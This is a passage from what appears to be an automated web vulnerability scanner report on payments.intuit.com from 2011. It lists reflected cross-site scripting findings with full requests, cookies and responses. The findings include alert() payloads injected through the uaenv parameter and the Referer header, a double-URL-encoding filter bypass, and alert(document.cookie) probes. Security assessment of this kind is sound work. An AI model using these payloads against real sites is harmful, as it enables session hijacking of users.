Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161658

...[SNIP]...
<input type="radio" id="in_quickbooks_true" name="process_payment_type" value="true" onclick="changeMSCFlag('true','cardfbd42"><script>alert(1)</script>c5a639cbe3e');" />
...[SNIP]...

1.4. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [uaenv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the uaenv request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 100cc'%3balert(1)//21604655727 was submitted in the uaenv parameter. This input was echoed as 100cc';alert(1)//21604655727 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply-now/check-warranty-apply-now.jsp?requestType=rtnFromUA&uaenv=prod100cc'%3balert(1)//21604655727&bas=card HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:14 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=euYdvJzwS0vhcYVatmDW7w**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:16 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C195D0A0805192AA117E38C4A9C75
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161460

...[SNIP]...
tedHardwareId);
       var bas;
       if(initialSelectedSolution != undefined && initialSelectedSolution != '')
       {
           bas = initialSelectedSolution;
       }
if(UAenv == null)
{
           UAenv = 'prod100cc';alert(1)//21604655727';
}
       if(UAenv == "null" || UAenv == null)
       {
           UAenv = "prod";
       }
       var return_url = 'http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp' + "?requestType=rtnFromUA&uaenv
...[SNIP]...

1.5. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [uaenv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the uaenv request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5165"%3balert(1)//11b088fde41 was submitted in the uaenv parameter. This input was echoed as c5165";alert(1)//11b088fde41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply-now/check-warranty-apply-now.jsp?requestType=rtnFromUA&uaenv=prodc5165"%3balert(1)//11b088fde41&bas=card HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:59:50 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=Mpqqf8aOaufCGZGLg+D68Q**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:36:51 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95BBAA80A0805192AA117E3BFDAC659
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161460

...[SNIP]...

var ua_selected_add_on_service_ids;
var ua_available_add_on_services_ids;
var ua_selected_hardware_ids;
var ua_selected_hardware_own_type;    

var ua_selected_card_service_id;

var UAenv = "prodc5165";alert(1)//11b088fde41";

var mandatory_card_name;
var mandatory_card_id;

var selectedCardMap;
var records;
   

$(document).ready(function()
{
       requestType = 'rtnFromUA';
       bas = 'card';
       sbweb.util.log.
...[SNIP]...

1.6. http://payments.intuit.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5deb3%2527%252dalert%25281%2529%252d%2527ae164b743d5 was submitted in the Referer HTTP header. This input was echoed as 5deb3'-alert(1)-'ae164b743d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: payments.intuit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: INTUIT_SESSIONID=RELMgEwqF2E9P+VGkdp-iA**.g119-2; abTestId=0000000000002223720; abTestGroup=T2; abTestPriorityCode=0273400000; propertySegments=1300724387448%7CQB%3A1%3A%3A; s_cc=true; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300726205880%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; SurveyClosed=true; Survey_Tracker=TRUE; mbox=session#1300724385027-792520#1300726359|PC#1300724385027-792520.17#1303316499|check#true#1300724559; SHOPPER_USER_ID=2848631086
Referer: 5deb3%2527%252dalert%25281%2529%252d%2527ae164b743d5

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:21:37 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 05:58:38 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D938BD4E0A08058F1774D40DAF139FA7
x-wily-servlet: Clear appServerIp=10.8.5.143&agentName=app2&servletName=index_jsp&agentHost=esprdatg119&agentProcess=JBoss
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 108420

...[SNIP]...
<script>
                   // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = '5deb3'-alert(1)-'ae164b743d5';
                   </script>
...[SNIP]...

1.7. http://payments.intuit.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload b9588--><script>alert(1)</script>36da4f0cb8f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: payments.intuit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: INTUIT_SESSIONID=RELMgEwqF2E9P+VGkdp-iA**.g119-2; abTestId=0000000000002223720; abTestGroup=T2; abTestPriorityCode=0273400000; propertySegments=1300724387448%7CQB%3A1%3A%3A; s_cc=true; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300726205880%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; SurveyClosed=true; Survey_Tracker=TRUE; mbox=session#1300724385027-792520#1300726359|PC#1300724385027-792520.17#1303316499|check#true#1300724559; SHOPPER_USER_ID=2848631086
Referer: http://www.google.com/search?hl=en&q=b9588--><script>alert(1)</script>36da4f0cb8f

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:21:39 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 05:58:40 GMT; Path=/
Set-Cookie: priorityCode=4899600000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D938C4260A08058F1774D40DE881A3BE
x-wily-servlet: Clear appServerIp=10.8.5.143&agentName=app2&servletName=index_jsp&agentHost=esprdatg119&agentProcess=JBoss
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 108511

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=b9588--><script>alert(1)</script>36da4f0cb8f | -->
...[SNIP]...

1.8. http://payments.intuit.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ea6a'-alert(1)-'22e1363c582 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /?launchHelpMeChoose=true HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=1ea6a'-alert(1)-'22e1363c582

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:55:55 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=FZHR3jYkS+lzDwEbeMUcJw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:32:56 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D958225A0A0805192AA117E39659CAAC
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 108426

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=1ea6a'-alert(1)-'22e1363c582';
                   </script>
...[SNIP]...

1.9. http://payments.intuit.com/apply-now/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11fdb'-alert(1)-'203a332f69f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /apply-now/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=11fdb'-alert(1)-'203a332f69f

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:39 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=xA8xNwxVexVzMS2lpmfgzg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:40 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96022AC0A0805192AA117E3CA858BCC
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 128360

...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=11fdb'-alert(1)-'203a332f69f';
                   </script>
...[SNIP]...

1.10. http://payments.intuit.com/apply-now/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 38475--><script>alert(1)</script>4d6c73c632 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /apply-now/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=38475--><script>alert(1)</script>4d6c73c632

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:54 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=+mJdpJukVkdDu-nhiluhMA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:55 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9605E300A0805192AA117E31E12C9D2
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 128389

...[SNIP]...
<!--http://www.google.com/search?hl=en&q=38475--><script>alert(1)</script>4d6c73c632 | -->
...[SNIP]...

1.11. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74fca'-alert(1)-'5c9bded9b65 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /apply-now/check-warranty-apply-now.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
